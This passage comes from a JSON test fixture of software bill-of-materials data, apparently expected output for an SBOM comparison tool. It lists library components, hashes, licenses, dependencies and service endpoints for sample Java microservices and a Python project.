"da438577b4aeb0722ecfcaccfc43a37a07c78fdd6badc87caceb3abe58f31f82df9199e26a6b889a24bfe30cdf47626fbe8c4eb68e0f49497bd4b34e99f88b66"}, {"alg": "SHA3-512", "content": 
"e15fe01672fed6048e69d14ff865ce2986343d339c4ed806e5de0a2038b01a25dbbf457d3aa399692e8d8ad834c03e84619f683cd5bfee03facbf4500fbc51bb"}, {"alg": "SHA3-256", "content": "f86905c962d81e77ccdfeb4e189aad1cd22d015f7b35cb676a940e39aeb7c284"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-web", "publisher": "Spring IO", "purl": "pkg:maven/org.springframework/spring-web@5.0.7.RELEASE?type=jar", "scope": "required", "version": "5.0.7.RELEASE"}], "libraries": [{"bom-ref": "pkg:maven/com.fasterxml.jackson.core/jackson-annotations@2.9.0?type=jar", "type": "library", "description": "Core annotations used for value types, used by Jackson data binding package.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\com\\fasterxml\\jackson\\core\\jackson-annotations\\2.9.0\\jackson-annotations-2.9.0.jar"}]}, "occurrences": [{"location": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\domain\\ExchangeRatesContainer.java#9"}]}, "group": "com.fasterxml.jackson.core", "hashes": [{"alg": "SHA-1", "content": "07c10d545325e3a6e72e06381afe469fd40eb701"}, {"alg": "SHA-512", "content": "266589c36ea544ebca94aecd76ba9dfe88637563b94cf24e46846466b103074c9f95508bfa237c20d0ab9c60bfb6befa2628236dcf7222a69cf1ef9462bcf0b3"}, {"alg": "SHA-384", "content": "36289e4a5d6774c4fc6ed38a632a681759a4bc0389616a79edd22298dbcbe8f1bc7a107f00a9ec76b492d125c890a939"}, {"alg": "SHA-256", "content": "45d32ac61ef8a744b464c54c2b3414be571016dd46bfc2bec226761cf7ae457a"}, {"alg": "SHA3-256", "content": "5ad4c52561d43e8f80798256ae39449955b2d34376d3fbb9f354f9fcb61f477a"}, {"alg": "SHA3-512", "content": "8322ba66c29bfa8152a4c6294f6c3350d7a59fce154ba9db8624e369085aae42585addf864f373d250f76e5678b5967ecac79aff9255d96e5c109f310424f208"}, {"alg": "MD5", "content": "c09faa1b063681cf45706c6df50685b6"}, {"alg": "SHA3-384", "content": 
"d575397eff488d8b2e2098f1bcc8c0a7d49a3c0532ecec9c2996709576cf9fffe967f421dab2c4d2e280867efefd71af"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "jackson-annotations", "publisher": "FasterXML", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-annotations@2.9.0?type=jar", "scope": "required", "version": "2.9.0"}, {"bom-ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.6?type=jar", "type": "library", "description": "General data-binding functionality for Jackson: works on core streaming API", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\com\\fasterxml\\jackson\\core\\jackson-databind\\2.9.6\\jackson-databind-2.9.6.jar"}]}, "occurrences": [{"location": "account-service\\src\\test\\java\\com\\piggymetrics\\account\\controller\\AccountControllerTest.java#114"}, {"location": "account-service\\src\\test\\java\\com\\piggymetrics\\account\\controller\\AccountControllerTest.java#118"}, {"location": "account-service\\src\\test\\java\\com\\piggymetrics\\account\\controller\\AccountControllerTest.java#131"}, {"location": "account-service\\src\\test\\java\\com\\piggymetrics\\account\\controller\\AccountControllerTest.java#143"}, {"location": "auth-service\\src\\test\\java\\com\\piggymetrics\\auth\\controller\\UserControllerTest.java#51"}, {"location": "notification-service\\src\\test\\java\\com\\piggymetrics\\notification\\controller\\RecipientControllerTest.java#53"}, {"location": "statistics-service\\src\\test\\java\\com\\piggymetrics\\statistics\\controller\\StatisticsControllerTest.java#114"}]}, "group": "com.fasterxml.jackson.core", "hashes": [{"alg": "SHA3-512", "content": "480f9d8a7e5c2cb7ff981b3e004708dd632f8c472a8da3114486499a15a4bfa21ee4904e4ac5f0d1aef4dccd19fc95ceb1f9f6d5a65ea13ca2a7d9815585f82e"}, {"alg": "SHA-256", "content": 
"657e3e979446d61f88432b9c50f0ccd9c1fe4f1c822d533f5572e4c0d172a125"}, {"alg": "SHA-384", "content": "80682058957cb75863d94f0ed223dc69cad95526e41b80d2810bfb04308c6fbd4bf4df90f43edacd8f820d43296b61ea"}, {"alg": "SHA3-256", "content": "885a3161af0a28a56a7d41631034921b846f9b1b0e02062e0758b17337026bdf"}, {"alg": "SHA3-384", "content": "a5682de7a39422fde523ad1d6fe2db75a4a390266692362e296115e06e07e515cb6b85598ada103e54031dbefc5ea7f3"}, {"alg": "MD5", "content": "c6634d654c2df15a987bc37ec8d2b6b2"}, {"alg": "SHA-1", "content": "cfa4f316351a91bfd95cb0644c6a2c95f52db1fc"}, {"alg": "SHA-512", "content": "f0861f775e2aebd61df8a39419f959b61019af7b307812b92beb14d7a234edeaf09c054fbb24a1432f4dd0c726b7d2b535bdc3ecb8b3d00b661e01d4d46ec4be"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "jackson-databind", "publisher": "FasterXML", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.6?type=jar", "scope": "required", "version": "2.9.6"}, {"bom-ref": "pkg:maven/com.google.code.gson/gson@2.8.5?type=jar", "type": "library", "description": "Gson JSON library", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\com\\google\\code\\gson\\gson\\2.8.5\\gson-2.8.5.jar"}]}}, "group": "com.google.code.gson", "hashes": [{"alg": "MD5", "content": "089104cb90d8b4e1aa00b1f5faef0742"}, {"alg": "SHA3-512", "content": "0aed985c19435fb6d5e04a79a7553f56a66814157ac93addcb24f9286321d0063b69ac008501f0e22f691ecb15a50491d3313aee73a745286454817e2f410fe9"}, {"alg": "SHA-256", "content": "233a0149fc365c9f6edbd683cfe266b19bdc773be98eabdaf6b3c924b48e7d81"}, {"alg": "SHA-512", "content": "5dd7214c542a7b93aab3eab0ba13e4ac3d6ddb05c795fb6d3992e21925a98dce87cb186ac67b4d3ad146f96e14d38b3892837eca57a27b4e845aca6d4e4f708a"}, {"alg": "SHA-384", "content": "77f4d6efe8d9cf78b72f34e439035d266db1b82c9d96e6b78e6c571d4c719bb5f2b78e8377263280c6cc9dffe18b3d16"}, 
{"alg": "SHA3-256", "content": "94cde12c15a685a10309653cfef73d14d09b340f1b8f0a9a04267136e9bf2820"}, {"alg": "SHA3-384", "content": "953e2eca6de4a05e1cf86a9750aa9f1d10bfd06a15f7eaab4a59716cbec74a7bf6c5f421b1752d487882954daecc5781"}, {"alg": "SHA-1", "content": "f645ed69d595b24d4cf8b3fbb64cc505bede8829"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "gson", "purl": "pkg:maven/com.google.code.gson/gson@2.8.5?type=jar", "scope": "required", "version": "2.8.5"}, {"bom-ref": "pkg:maven/com.netflix.eureka/eureka-client@1.9.2?type=jar", "type": "library", "description": "eureka-client", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\com\\netflix\\eureka\\eureka-client\\1.9.2\\eureka-client-1.9.2.jar"}]}}, "group": "com.netflix.eureka", "hashes": [{"alg": "SHA-256", "content": "279fc7616a9c0c904dd11ba53aaeec0790d35511cbda2a81e8606b6c6a13c7f3"}, {"alg": "SHA3-256", "content": "2ed92d790b33a71dcc8de331d77bdde3c823ced8521ad0cd6e1f75430fdb04bf"}, {"alg": "SHA-512", "content": "3abb8075ff7ece646f8ae62c840a8b79b1163741a41e84a7dd7af939f554c6e2f9057ca901d10fe639b693fb9223a2f74bce00743b421a9263acdb246eeee7cb"}, {"alg": "SHA-1", "content": "47c0b71d8face149833c4958ac7b3b6171861f4c"}, {"alg": "SHA-384", "content": "99475120ea6b3ca18098f3346fe2a7ca539a472d2110e0aedf96d941403a1f37049df31785d1e4e3257adf44d0a5630a"}, {"alg": "SHA3-512", "content": "b0f8d56fa259be87844612709b83ba3611548215d405ecd02220a22e1539d2666a5cf37b51ca618291f92dbb007dfd4a6dfa037905bfd0d313b8221cc2605c5b"}, {"alg": "SHA3-384", "content": "b7a195e9f54f4189c8e27624ba44c5ff191ffe977d6e70ffc6d1795a4f4d4d3869d15992e555eed71cb427f744fd3b9b"}, {"alg": "MD5", "content": "f1a16ca3654e743409bb60c47eb02f01"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "eureka-client", "purl": "pkg:maven/com.netflix.eureka/eureka-client@1.9.2?type=jar", "scope": "required", 
"version": "1.9.2"}, {"bom-ref": "pkg:maven/com.netflix.netflix-commons/netflix-eventbus@0.3.0?type=jar", "type": "library", "description": "netflix-eventbus", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\com\\netflix\\netflix-commons\\netflix-eventbus\\0.3.0\\netflix-eventbus-0.3.0.jar"}]}}, "group": "com.netflix.netflix-commons", "hashes": [{"alg": "SHA3-512", "content": "13549ecc52b63986900eefd48441f78687a5ac0f89d752752f3c973e7d664607785a6b8850ef7ab6181cc4f90580301cc0a19f2fc694e3f97d9776bd43f416e9"}, {"alg": "SHA-384", "content": "192c415c11edbc320d0d7b2f41c485bae7dbc20d9f406d0b05a5d02436a005a72d4dc015190748749ac74314f20c496b"}, {"alg": "SHA-256", "content": "387bce0906f22c285ed96bcc520a7581d6abbc418b6c3c1e45a4530eb97d94b1"}, {"alg": "SHA-1", "content": "3f864adbe81f0849729fcbba3fe693c32be739ea"}, {"alg": "SHA3-256", "content": "840ce15c01ed37b974b4c5ab4a75d539afb6c43cad90437504d23884864735d5"}, {"alg": "MD5", "content": "8ad05394a13f658a67d1e4cbf0359402"}, {"alg": "SHA-512", "content": "94a6efc1be744e281211f7856037c057863ad67ee1a45bd4cfc1adbb15216a6cb20ba0d54caa26d902f653efe496098b5e71eb5b2c466b10deb94af7559f67a0"}, {"alg": "SHA3-384", "content": "d8580812de33ef27de8dc91205cf56b2aec19572fcfc7fd49e723ed17e4eb4d853f99627417bd9bd30f1cd7de24b4dcf"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "netflix-eventbus", "purl": "pkg:maven/com.netflix.netflix-commons/netflix-eventbus@0.3.0?type=jar", "scope": "required", "version": "0.3.0"}, {"bom-ref": "pkg:maven/com.netflix.netflix-commons/netflix-infix@0.3.0?type=jar", "type": "library", "description": "netflix-infix", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": 
"C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\com\\netflix\\netflix-commons\\netflix-infix\\0.3.0\\netflix-infix-0.3.0.jar"}]}}, "group": "com.netflix.netflix-commons", "hashes": [{"alg": "SHA3-256", "content": "14f1ba7c66c7b18a45bb2949f784d9028911bdf80376e1553bd9ed6d15083720"}, {"alg": "SHA-384", "content": "185629545fd32a7b890c4318cb7979f0475fa42e54039c80105c4eb20efbe5eabf0338ab59256440fc6366e9bc84d0e4"}, {"alg": "MD5", "content": "3410072887ca26fc0b7e71a7e91f8e2b"}, {"alg": "SHA-512", "content": "477278c1d16d6753a1a2acdb0edd8189b069db1828dd34d808985b48924257e0971ec190bf6efafb14b962e3e0158f2221c195a83fe9bd38fb1574e6cdbf90d3"}, {"alg": "SHA3-384", "content": "7aa7b6c88a89c3324677846543b54b5151d45370d48309a529e492576c64174958f22564ed0d5b88a24d5b0696554326"}, {"alg": "SHA-256", "content": "7dec45215c262c4f0a42c1f3adb8613788cf43c6ed21274e15c73ea5500d2597"}, {"alg": "SHA-1", "content": "acc65969f7367ddd2f1265e0cd7330509ed530dc"}, {"alg": "SHA3-512", "content": "e0b9054727385449f0d29062959eed8ca5f4dec126b85c82fd04155b136ecdf5a4dc1cb78b837f5ff3b86f72b3241d4507f0d4008f519aced1ff2637eb6df3c5"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "netflix-infix", "purl": "pkg:maven/com.netflix.netflix-commons/netflix-infix@0.3.0?type=jar", "scope": "required", "version": "0.3.0"}, {"bom-ref": "pkg:maven/commons-jxpath/commons-jxpath@1.3?type=jar", "type": "library", "description": "A Java-based implementation of XPath 1.0 that, in addition to XML processing, can inspect/modify Java object graphs (the library's explicit purpose) and even mixed Java/XML structures.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\commons-jxpath\\commons-jxpath\\1.3\\commons-jxpath-1.3.jar"}]}}, "group": "commons-jxpath", "hashes": [{"alg": "SHA-384", "content": 
"327139dac9f672ffa772480a754ec6c3125a3057faf7911188a34cc52d088770efe8464bb303e2347be7f55303d24493"}, {"alg": "SHA-512", "content": "351c5f6af0711a955e5d839551833015956812765e9dc35e78bfd7c99656f1ecec5cf6587469229688340f00c2b5d07917993ccb0809561e0dd35b4ffb074d93"}, {"alg": "SHA3-256", "content": "3bbafe102ece8be037419a214a524f0c52fa0c3455322d3c2633f1c075e9efbc"}, {"alg": "MD5", "content": "61a9aa8ff43ba10853571d57f724bf88"}, {"alg": "SHA3-384", "content": "b2913b137433bfc2fe78ed57dc44de5737410947e809c0b8bb1d6a83ad333069e41fd97167c20e9fd3a052c2a7dfa9b8"}, {"alg": "SHA-1", "content": "c22d7d0f0f40eb7059a23cfa61773a416768b137"}, {"alg": "SHA3-512", "content": "e050591ecd10746ffee670e1e95a53afa8b43b01164c3ae581bce9ee0a5410eece3f71d05175486eb4d186de88d5defeebef52730939611951ca1cd50ec978a7"}, {"alg": "SHA-256", "content": "fcbc0ad917d9d6a73c6df21fac322e00d213ef19cd94815a007c407a8a3ff449"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "commons-jxpath", "publisher": "The Apache Software Foundation", "purl": "pkg:maven/commons-jxpath/commons-jxpath@1.3?type=jar", "scope": "required", "version": "1.3"}, {"bom-ref": "pkg:maven/joda-time/joda-time@2.9.9?type=jar", "type": "library", "description": "Date and time library to replace JDK date handling", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\joda-time\\joda-time\\2.9.9\\joda-time-2.9.9.jar"}]}}, "group": "joda-time", "hashes": [{"alg": "SHA3-256", "content": "22837a75e07c2c56cb3565e324f157f0850f9df62471293af3a77ec2ad456535"}, {"alg": "SHA-512", "content": "3a6749ecd71ee8d5781821c36d77850a810e72ee33757ec4ee9e3d424676dced7eeb955a432f45edb3694dc14dbe1ee4c608545d6a445b29b86979a7c9829384"}, {"alg": "SHA-384", "content": "76fadb1a66e6e6f9780aef2ca6ecfe6e07c0abb0829cc436c0ebf02186ba571219a290ec4bf1b510059594b146d39eff"}, {"alg": "SHA3-384", "content": 
"9f4b85b886cd0b78b1404522979c0bd150dfe27f01469a17e943d35f5fad2de37fd88f35c0f0d49613c81a6fc0a8cd6b"}, {"alg": "SHA-256", "content": "b049a43c1057942e6acfbece008e4949b2e35d1658d0c8e06f4485397e2fa4e7"}, {"alg": "SHA3-512", "content": "b7f8c9cac6086a5c7d861e5dfa9a42c1191ae17e9d9bfbae5eea2e1f6e25eb084fcb9bdc6bbb7d9c693d423452c9533b1216648793d5ca31675af23d1a0f0397"}, {"alg": "MD5", "content": "eca438c8cc2b1de38e28d884b7f15dbc"}, {"alg": "SHA-1", "content": "f7b520c458572890807d143670c9b24f4de90897"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "joda-time", "publisher": "Joda.org", "purl": "pkg:maven/joda-time/joda-time@2.9.9?type=jar", "scope": "required", "version": "2.9.9"}, {"bom-ref": "pkg:maven/org.antlr/stringtemplate@3.2.1?type=jar", "type": "library", "description": "StringTemplate is a java template engine for generating source code, web pages, emails, or any other formatted text output. StringTemplate is particularly good at multi-targeted code generators, multiple site skins, and internationalization/localization. It evolved over years of effort developing jGuru.com. StringTemplate also generates the stringtemplate website: http://www.stringtemplate.org and powers the ANTLR v3 code generator. Its distinguishing characteristic is that unlike other engines, it strictly enforces model-view separation. Strict separation makes websites and code generators more flexible and maintainable; it also provides an excellent defense against malicious template authors. 
There are currently about 600 StringTemplate source downloads a month.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\antlr\\stringtemplate\\3.2.1\\stringtemplate-3.2.1.jar"}]}}, "group": "org.antlr", "hashes": [{"alg": "SHA-512", "content": "47f3cfd91906b527b615fd10d27387aafa9f355aa9c18a86861c975091c39895b711fe514ed1597dabe6af2a2705dfc45bb70fb5e30f5d428a48e0d1b02b7856"}, {"alg": "SHA-1", "content": "59ec8083721eae215c6f3caee944c410d2be34de"}, {"alg": "SHA3-256", "content": "6181e67482392f97de747d04dc11418e54ca77888d1d1f6925563fe6a2c1633b"}, {"alg": "SHA-384", "content": "a12c2a95e162207835a2a785f2dfccd4b3d9d9b94741d1b3e171ff04699afc920c549425115c63a95c7941ead3909edf"}, {"alg": "MD5", "content": "b58ca53e518a92a1991eb63b61917582"}, {"alg": "SHA3-384", "content": "d9ccd03170058316ea8c98142afbecb7a3b357dda5cd1253c9b57810449048fae7d79e93d5ba74cb901bd765429d8714"}, {"alg": "SHA3-512", "content": "e75331f732a6c9e280f04438db65c47aa2efb4b07980ad3ce5e227693b47c5959d87e40590e19552f67dc257cc4f187a35ee112e850a6bda9d9e69bba2dba34c"}, {"alg": "SHA-256", "content": "f66ce72e965e5301cb0f020e54d2ba6ad76feb91b3cbfc30dbbf00c06a6df6d7"}], "licenses": [{"license": {"name": "BSD licence", "url": "http://antlr.org/license.html"}}], "name": "stringtemplate", "purl": "pkg:maven/org.antlr/stringtemplate@3.2.1?type=jar", "scope": "required", "version": "3.2.1"}, {"bom-ref": "pkg:maven/org.codehaus.jettison/jettison@1.3.7?type=jar", "type": "library", "description": "A StAX implementation for JSON.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\codehaus\\jettison\\jettison\\1.3.7\\jettison-1.3.7.jar"}]}}, "group": "org.codehaus.jettison", "hashes": [{"alg": "SHA-512", "content": 
"1304499b9951cba15f10486a061d91ec91efec7aa039162d5fa3d4effb60596fd1c73152fa46d170bbe065d98718f4c9354403bcee7aa3acd03d7b03aa45eeee"}, {"alg": "SHA-384", "content": "4cf5155094f09370f72e94768d6f1429662fb6dcfe6df00f91d78977d42a61dd62d51f1464d3d79eb7363ded95f53474"}, {"alg": "SHA3-384", "content": "5e88aeeb907a6b304a2125a01b55549633b64ce7a43469eff7fdb82ad9e3dfe2e48696c8fd184b2cec6e6062dd1079eb"}, {"alg": "SHA-1", "content": "7d36a59a0577f11b12088b9e215d6860345b9e1d"}, {"alg": "SHA-256", "content": "b39e77d92f5a682c639c8962980499e6be34b5c9fda7ad4dba3b5fd9e99b5070"}, {"alg": "MD5", "content": "c1ce879e927ca435da0fd2fd6c8a6b60"}, {"alg": "SHA3-512", "content": "c75a5dc446297a1eaac02f36829ea2891ffa5e9a3ca45a888f935d8cd65e6f3cab9c6410b45b36987c23674c243b9d6f0d4371f9efec92b70b92a4355732c329"}, {"alg": "SHA3-256", "content": "e8c94791fa652fbc24dbd55ce3fb3ad3cc703d576f935a4b4d2710148615cf9c"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "jettison", "purl": "pkg:maven/org.codehaus.jettison/jettison@1.3.7?type=jar", "scope": "required", "version": "1.3.7"}, {"bom-ref": "pkg:maven/stax/stax-api@1.0.1?type=jar", "type": "library", "description": "StAX API is the standard java XML processing API defined by JSR-173", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\stax\\stax-api\\1.0.1\\stax-api-1.0.1.jar"}]}}, "group": "stax", "hashes": [{"alg": "SHA3-384", "content": "03ebb8db88d04b7308570c1058aadfb6a81d3d6725b1dd13a049ea984ed1df42d3e0f8163e1229752228cada978fb462"}, {"alg": "SHA-384", "content": "2e6c232d3012064dc17e10c2e5b281728a6771eb0d74868e730caf60fe6f96fdd6145759fbbf9d1aa2e07eb1f49764d6"}, {"alg": "SHA-512", "content": "43c24e8dbffa9b932492c8ccf2b91926b2ba3d1d34b5a9671c689bd24d4c220b996708a9667521641d1abbf29404b653755b6f6f3dc0ad0671f5c09db332ea06"}, {"alg": "SHA-1", "content": "49c100caf72d658aca8e58bd74a4ba90fa2b0d70"}, 
{"alg": "MD5", "content": "7d436a53c64490bee564c576babb36b4"}, {"alg": "SHA3-256", "content": "8173e3e3a0db17b3dbb80c017268858ecda57c819e5b58dbe202bd8087664bb1"}, {"alg": "SHA-256", "content": "d1968436fc216c901fb9b82c7e878b50fd1d30091676da95b2edd3a9c0ccf92e"}, {"alg": "SHA3-512", "content": "e9a7c234dfeff5d4cabd034a536f31ad5a141e30b0ad2438cf5856dd6c36eeb16c69b8bc1ba3ee6bba91f69cd3cbd450953249f2f0eee0a9a22d49637b575f4d"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "stax-api", "purl": "pkg:maven/stax/stax-api@1.0.1?type=jar", "scope": "required", "version": "1.0.1"}]}, "dependencies": [{"ref": "pkg:maven/ch.qos.logback/logback-classic@1.2.3?type=jar", "dependsOn": ["pkg:maven/ch.qos.logback/logback-core@1.2.3?type=jar", "pkg:maven/org.slf4j/slf4j-api@1.7.25?type=jar"]}, {"ref": "pkg:maven/ch.qos.logback/logback-core@1.2.3?type=jar", "dependsOn": []}, {"ref": "pkg:maven/org.apache.logging.log4j/log4j-to-slf4j@2.10.0?type=jar", "dependsOn": ["pkg:maven/org.apache.logging.log4j/log4j-api@2.10.0?type=jar", "pkg:maven/org.slf4j/slf4j-api@1.7.25?type=jar"]}, {"ref": "pkg:maven/org.slf4j/slf4j-api@1.7.25?type=jar", "dependsOn": []}, {"ref": "pkg:maven/org.springframework.boot/spring-boot-autoconfigure@2.0.3.RELEASE?type=jar", "dependsOn": ["pkg:maven/org.springframework.boot/spring-boot@2.0.3.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework.boot/spring-boot-starter-logging@2.0.3.RELEASE?type=jar", "dependsOn": ["pkg:maven/ch.qos.logback/logback-classic@1.2.3?type=jar", "pkg:maven/org.apache.logging.log4j/log4j-to-slf4j@2.10.0?type=jar", "pkg:maven/org.slf4j/jul-to-slf4j@1.7.25?type=jar"]}, {"ref": "pkg:maven/org.springframework.boot/spring-boot@2.0.3.RELEASE?type=jar", "dependsOn": ["pkg:maven/org.springframework/spring-context@5.0.7.RELEASE?type=jar", "pkg:maven/org.springframework/spring-core@5.0.7.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework/spring-aop@5.0.7.RELEASE?type=jar", "dependsOn": 
["pkg:maven/org.springframework/spring-beans@5.0.7.RELEASE?type=jar", "pkg:maven/org.springframework/spring-core@5.0.7.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework/spring-beans@5.0.7.RELEASE?type=jar", "dependsOn": ["pkg:maven/org.springframework/spring-core@5.0.7.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework/spring-context@5.0.7.RELEASE?type=jar", "dependsOn": ["pkg:maven/org.springframework/spring-aop@5.0.7.RELEASE?type=jar", "pkg:maven/org.springframework/spring-beans@5.0.7.RELEASE?type=jar", "pkg:maven/org.springframework/spring-core@5.0.7.RELEASE?type=jar", "pkg:maven/org.springframework/spring-expression@5.0.7.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework/spring-core@5.0.7.RELEASE?type=jar", "dependsOn": ["pkg:maven/org.springframework/spring-jcl@5.0.7.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework/spring-expression@5.0.7.RELEASE?type=jar", "dependsOn": ["pkg:maven/org.springframework/spring-core@5.0.7.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework/spring-jcl@5.0.7.RELEASE?type=jar", "dependsOn": []}], "services": [{"name": "com-piggymetrics-account-controller-AccountController-getAccountByName-service", "endpoints": ["/{name}"], "authenticated": true, "x-trust-boundary": true}, {"name": "com-piggymetrics-account-controller-AccountController-getCurrentAccount-service", "endpoints": ["/current"]}, {"name": "com-piggymetrics-account-controller-AccountController-saveCurrentAccount-service", "endpoints": ["/current"]}, {"name": "com-piggymetrics-auth-controller-UserController-getUser-service", "endpoints": ["/current"]}, {"name": "com-piggymetrics-notification-client-AccountServiceClient-getAccount-service", "endpoints": ["/accounts/{accountName}"]}, {"name": "com-piggymetrics-notification-controller-RecipientController-getCurrentNotificationsSettings-service", "endpoints": ["/current"]}, {"name": 
"com-piggymetrics-notification-controller-RecipientController-saveCurrentNotificationsSettings-service", "endpoints": ["/current"]}, {"name": "com-piggymetrics-statistics-client-ExchangeRatesClient-getRates-service", "endpoints": ["/latest"]}]}, "test/sbom-java2.json": {"components": {"frameworks": [{"bom-ref": "pkg:maven/javax.activation/activation@1.1?type=jar", "type": "framework", "description": "JavaBeans Activation Framework (JAF) is a standard extension to the Java platform that lets you take advantage of standard services to: determine the type of an arbitrary piece of data; encapsulate access to it; discover the operations available on it; and instantiate the appropriate bean to perform the operation(s).", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\javax\\activation\\activation\\1.1\\activation-1.1.jar"}]}}, "group": "javax.activation", "hashes": [{"alg": "SHA-256", "content": "2881c79c9d6ef01c58e62beea13e9d1ac8b8baa16f2fc198ad6e6776defdcdd3"}, {"alg": "SHA3-256", "content": "5fb94d2742cc3d44abad42c5d61b9c7464a2ef33bc58b4b5b121d49799123460"}, {"alg": "MD5", "content": "8ae38e87cd4f86059c0294a8fe3e0b18"}, {"alg": "SHA-512", "content": "c0ff5bf3ace7acc1b31fcc109cee48d9eb8f025ae15a31dc91eca760933bdb97c93f05d61e95af1e317859d72e5f179f897f5bf3df0e3810f4212d43bacee4bd"}, {"alg": "SHA-384", "content": "c4ee54d80a2e67e819700051d6cfa01a17631c89f942b8690afb601e491f02d7497fe57bd5c70edfb9b444ae8222b846"}, {"alg": "SHA3-512", "content": "c5e37fe3d9c420a9035f1160eb1d396e94f01851c01c6e2f19f19a221bfc484e63f9660c7377f58aa65246b95a9eb799ac4e6798c0b20f658edf00a4435e1efa"}, {"alg": "SHA3-384", "content": "de0777d2d1d7aad105defb12aed17ef38abfe89db2449c5243fa3c69304ea24dd8df0881330351d0733313e8f7252814"}, {"alg": "SHA-1", "content": "e6cb541461c2834bdea3eb920f1884d1eb508b50"}], "licenses": [{"license": {"id": "CDDL-1.0"}}], "name": 
"activation", "purl": "pkg:maven/javax.activation/activation@1.1?type=jar", "scope": "required", "version": "1.1"}], "libraries": [{"bom-ref": "pkg:maven/com.piggymetrics/turbine-stream-service@0.0.1-SNAPSHOT?type=jar", "type": "library", "description": "Turbine Stream Service", "group": "com.piggymetrics", "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "turbine-stream-service", "purl": "pkg:maven/com.piggymetrics/turbine-stream-service@0.0.1-SNAPSHOT?type=jar", "version": "0.0.1-SNAPSHOT"}]}, "dependencies": [{"ref": "pkg:maven/javax.activation/activation@1.1?type=jar", "dependsOn": []}]}}}, "result_5": {"diff_summary": {"bom_1.json": {}, "bom_2.json": {}}, "common_summary": {"components": {"libraries": [{"bom-ref": "pkg:pypi/requests@2.31.0", "type": "library", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "/home/runner/work/src_repos/python/django-goat/requirements_tests.txt"}]}}, "name": "requests", "properties": [{"name": "SrcFile", "value": "/home/runner/work/src_repos/python/django-goat/requirements_tests.txt"}], "purl": "pkg:pypi/requests@2.31.0", "version": "2.31.0"}]}}}, "result_6": {"test/sbom-python.json": {"components": [{"version": "1.0.1"}, {"version": "2.11.3"}, {"bom-ref": "pkg:pypi/markupsafe@1.1.1", "name": "MarkupSafe", "purl": "pkg:pypi/markupsafe@1.1.1", "version": "1.1.1"}, {"bom-ref": "pkg:pypi/itsdangerous@1.1.0", "name": "itsdangerous", "purl": "pkg:pypi/itsdangerous@1.1.0", "version": "1.1.0"}, {"bom-ref": "pkg:pypi/click@7.1.2", "name": "click", "purl": "pkg:pypi/click@7.1.2", "version": "7.1.2"}], "dependencies": [{"ref": "pkg:pypi/itsdangerous@1.1.0"}, {"ref": "pkg:pypi/click@7.1.2"}, {"dependsOn": ["pkg:pypi/click@7.1.2", "pkg:pypi/itsdangerous@1.1.0", "pkg:pypi/jinja2@2.11.3", "pkg:pypi/werkzeug@1.0.1"], "ref": "pkg:pypi/flask@1.1.2"}], "services": [{"endpoints": ["/create_user"], "name": "users-service"}]}, "test/sbom-python2.json": 
